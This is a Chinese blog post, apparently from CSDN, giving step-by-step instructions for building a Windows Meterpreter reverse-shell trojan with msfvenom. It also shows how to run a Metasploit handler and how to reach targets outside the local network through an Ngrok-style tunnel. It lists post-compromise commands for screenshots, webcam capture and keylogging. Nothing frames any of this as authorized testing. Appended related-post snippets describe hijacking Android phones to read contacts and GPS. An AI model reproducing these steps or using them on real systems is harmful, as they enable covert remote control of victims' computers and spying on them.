kali渗透内网和外网

于 2024-05-13 09:37:46 发布
阅读量904 收藏 25
点赞数 30
文章标签: linux 运维 服务器 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzz6583zz/article/details/138786506
版权

生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)

第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:

-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”

lhost:设置kali的IP

lport:设置端口(要与下面的setlport保持一致)

-f:文件的类型为exe类型

-o:生成payload,名为payload.exe,保存在kali的/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f
exe -o /root/tjy.exe

第二步:将生成的木马文件发送到对方电脑

我们启动kali

msfconsole 进入msfconsole

use exploit/multi/handler 使用这个漏洞辅助

设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致

exploit 或 run

接下来我们只要等对方电脑运行刚刚那个木马

生成木马文件,从而控制对方电脑(内网可以入侵外网)

在开始生成木马之前,我们要先做好准备工作

在kali里面要下载Sunny-Ngrok的Linux64版本,下载好后解压

接着我们要在Sunny-
Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用

这里将下载好的linux64压缩包进行解压

命令解压缩:unzip linux_amd64(压缩包名)

进入解压好的目录

cd linux_amd64

启动隧道映射TCP服务

./sunny clientid (隧道id) 这里的隧道id看下图

启动后是这样的

接下来就是生成外网的木马程序了

注意:这里lhost和lport分别为赠送的域名和端口

msfvenom -p
windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe

接下来就是在msf中设置payload,加载攻击模块设置本地IP何监听端口了

msfconsole 打开msf

use exploit/multi/handler 使用这个漏洞辅助

set payload windows/meterpreter/reverse_tcp
设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set LHOST 192.168.245.140 这里设置成kali的IP

set LPORT 4444 这里是你要侦听的端口

这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网

show options 查看IP端口设置情况

exploit 或 run 开启侦听

接下来我们只要等对方电脑运行刚刚那个木马

成功后时以下这图

入侵成功后所能做的(这只是可以做的一部分)

getuid 获取靶机uidmeterpreter

shell 进入靶机shellmeterpreter

screenshot 靶机截屏meterpreter

webcam_snap 用靶机摄像头拍照meterpreter

webcam_stream 用靶机摄像头录像meterpreter

keyscan_start 开启键盘记录meterpreter

keyscan_dump 捕获键盘记录

keyscan_stop 停止键盘记录

如何入门网络安全

建议

多看书

阅读永远是最有效的方法,尽管书籍并不一定是最好的入门方式,但书籍的理解需要一定的基础;但是就目前来看,书籍是比较靠谱的入门资料。

现在Web安全书籍比较多,因此大家在学习的过程中可以少走了不少的弯路。如果以上推荐书籍阅读有困难,那就找自己能看得进的 Web 安全的书

当然纸上谈兵终觉浅,最好还是实践一下。

对于那些没有学习方向和资料的同学,可以看下我整理的资源,这份资料经历过社会的实践,可以说是当下全网较全的网络安全知识体系:
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述

如果你对网络安全入门感兴趣,那么你点击这里👉CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

程序员鱼
关注
  • 30
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux利用MSF入侵安卓手机(零基础版超详细)
m0_74914256的博客
05-05 1万+
Kali Linux利用MSF入侵安卓手机新手下白版最详细,查看对方手机系统信息,查看对方手机安装哪些app文件,远程控制对方手机拍摄一张照片,远程控制对方手机开起视频聊天,实时查看对方手机的信息,获取对方手机的通讯录,实时获取对方手机GPS定位
利用Kali 完成一次简单的渗透
热门推荐
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
kali linux 渗透测试之内网渗透
05-02
理论加实战结合,学习后具备自动化批量控制内网主机的能力,具备安全工程师岗位的基本能力。专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
Kali Linux渗透测试技术详解_渗透测试入门
m0_61869253的博客
06-02 1451
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
kali利用ms17-010漏洞实现win7系统入侵
最新发布
2301_77296801的博客
10-12 1682
MS17-010漏洞是在2017年5月份由NSA泄露出来的一个漏洞,该漏洞影响了微软Windows操作系统中的SMBv1协议,攻击者可通过该漏洞远程执行代码,从而控制目标系统。此漏洞被称为“永恒之蓝”(EternalBlue)。攻击者可以利用该漏洞构造恶意SMB数据包,直接向目标系统发送攻击代码,从而远程控制目标系统。攻击者可以利用该漏洞传播恶意代码,建立僵尸网络,进行勒索软件攻击等,下面进行该攻击的教学。在这里我们以Windows虚拟机作为漏洞靶机,在Kali Linux中运行攻击命令。1、点击。
Kali网络渗透英文词汇-圣经版
11-01
Kali网络渗透英文词汇-圣经版
Kali Linux无线网络渗透kali安装教程
11-06
kali安装教程,适合新手练习渗透测试,ali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64...
Kali Linux无线网络渗透测试教程
12-25
Kali Linux无线网络渗透测试教程
kali渗透
07-24
kali渗透kali渗透kali渗透kali渗透kali渗透kali渗透
Kali渗透测试技术实战
07-24
硬盘最小120G,尤其是在密码破解、取证和做渗透测试项目的情况下,要求获得控制权限,大量生成数据、收集证据、生成日志和报告。 第三章 软件、补丁和升级 第四章 配置 kali 第五章渗透测试实验环境 第六章渗透测试...
Web渗透测试 使用Kali Linux
06-15
使用kali linuxweb渗透的经典书籍,外文书籍中文翻译。
局域网入侵
03-15
菜鸟学习局域网入侵!入门技术应用,适合所有新手。
Kali渗透系统2018.1
06-13
Kali渗透系统,版本是2018.1,经过虚拟机测试,亲测可用。
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试等
Kali 渗透测试 pdf
04-08
Kali 渗透测试 pdf
vulnstack4渗透-外网
weixin_51441054的博客
04-20 3081
环境搭建 靶机:ubuntu:ubuntu(web服务器 网卡1:192.168.142.139(模拟外网) 网卡2:192.168.183.130(内网)) 域成员机器:douser:Dotest123(192.168.183.128)win7 DC:administrator:admin123,.(192.168.183.130)windowsserver2008 kali攻击机:192.168.142.134(模拟外网) 先对web靶机进行信息收集 发现一个ssh服...
Kali-WEB渗透-skipfish使用方法
lvwuwei的博客
05-03 1070
Kali——WEB渗透 学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。 —— 扫描:Skipfish—— skipfish:是一款由谷歌开发的实验性的主动WEB安全评估工具,使用C语言编写,体量小但是功能齐全。特点是:递归爬站,基于字典的探测,速度较快(多路单线程,启发式自动内容探测),误报相对较低。 2.使用 (1).格式:skipfish [opti...
利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑
WuHao的博客
10-26 5652
前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马。 首先安装Venom Venon克隆地址:https://github.com/r00t-3xp10it/venom tar.gz OR zip OR git clone 2.赋予文件可执行权限: cd venom-main sudo chmod -R +x *.sh 3.安装依赖关系包: cd aux sudo ./setup.sh 4.运行 sudo.
kali linux渗透外网手机
06-06
### 回答1: Kali Linux 是一种流行的渗透测试操作系统,可用于测试和评估计算机系统和网络的安全性。如果您想使用 Kali Linux 渗透测试外部网络和手机,需要具备一定的计算机技能和知识。 首先,您需要了解一些基本的网络安全知识,例如常见的漏洞和攻击方法,以及如何使用常见的安全工具。其次,您需要了解如何使用 Kali Linux 中的命令和工具,例如 Metasploit 和 Nmap。 对于渗透测试手机,您需要具备一定的移动设备安全知识,例如了解 Android 和 iOS 操作系统的漏洞和安全设置。您还需要了解如何使用适当的工具和技术来识别和利用这些漏洞。 需要注意的是,渗透测试是一项敏感的任务,必须在符合法律规定和道德准则的前提下进行。在进行渗透测试之前,您应该获得授权并与所涉及的组织或人员进行沟通和协商。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值